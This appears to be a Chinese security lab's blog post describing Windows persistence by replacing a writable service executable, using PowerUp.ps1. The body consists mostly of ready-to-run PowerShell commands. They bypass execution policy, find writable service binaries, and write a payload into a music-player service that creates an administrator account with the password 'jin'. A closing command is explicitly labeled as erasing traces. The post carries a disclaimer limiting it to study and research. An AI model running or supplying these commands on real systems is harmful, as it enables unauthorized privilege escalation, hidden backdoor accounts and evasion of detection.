咨詢服務熱線

400-6446-808

創安實驗室專欄
您的當前位置:首頁 > 創安實驗室專欄
windows利用常見程序進行(xíng)權限維持
發布者:創信華通(tōng)  發布時(shí)間(jiān):2023-02-24  浏覽量:256次











古語有(yǒu)雲:“學如逆水(shuǐ)行(xíng)舟,不進則退。”面對如今随時(shí)都在變化的網絡安全環境更是如此。為(wèi)此,創信華通(tōng)微信公衆号特開(kāi)設“創安實驗室專欄”,以記錄創信華通(tōng)創安實驗室在技(jì)術(shù)上(shàng)的探索,加強同行(xíng)間(jiān)的交流,相互學習,共同進步。


+

+

windows利用常見程序進行(xíng)權限維持

原理(lǐ):利用PowerUp.ps1生(shēng)成一個(gè)可(kě)以執行(xíng)我們構造的惡意命令的同名可(kě)執行(xíng)程序并替換原本的可(kě)執行(xíng)程序。主程序執行(xíng)時(shí)調用同名可(kě)執行(xíng)程序來(lái)執行(xíng)我們構造的惡意命令。

查找具有(yǒu)可(kě)寫的可(kě)執行(xíng)文件:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

查看程序對用戶的權限:icacls "D:\tools\KGMusic\9.1.44.23567\service.exe"

利用可(kě)執行(xíng)文件提權,向可(kě)寫程序中寫入創建用戶的payload:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Write-ServiceEXE -ServiceName KugouService -Username jin -Password jin -Verbose}"

等待服務重啓或對應程序再次運行(xíng):

可(kě)以看到此時(shí)新建了一個(gè)管理(lǐ)員權限的用戶jin

清理(lǐ)痕迹:powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Restore-ServiceEXE -ServiceName KugouService}"


E·N·D


本文由創信華通(tōng)創安實驗室編輯。

本文僅限于個(gè)人(rén)學習和(hé)技(jì)術(shù)研究,由于傳播、利用此文所提供的信息而造成刑事案件、非授權攻擊等違法行(xíng)為(wèi),均由使用者本人(rén)負責,本單位不為(wèi)此承擔任何責任。創安攻防實驗室擁有(yǒu)對此文章的修改和(hé)解釋權,如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明(míng)等全部內(nèi)容。


如有(yǒu)侵權,請(qǐng)聯系後台。




創安實驗室

創信華通(tōng)創安實驗室,是成都伍紀信息科技有限公司旗下的技(jì)術(shù)研究團隊,成立于2021年9月,主要研究紅藍(lán)對抗、重大(dà)安全保障、應急響應等方向。

創安攻防實驗室圓滿完成了多(duō)次公安舉辦的重要網絡安全保障和(hé)攻防演習活動,并積極參加各類網絡安全競賽,屢獲殊榮。

創安攻防實驗室秉承創信華通(tōng)的發展理(lǐ)念,緻力打造國內(nèi)一流網絡安全團隊。



上(shàng)一條:CVE-2020-14882分析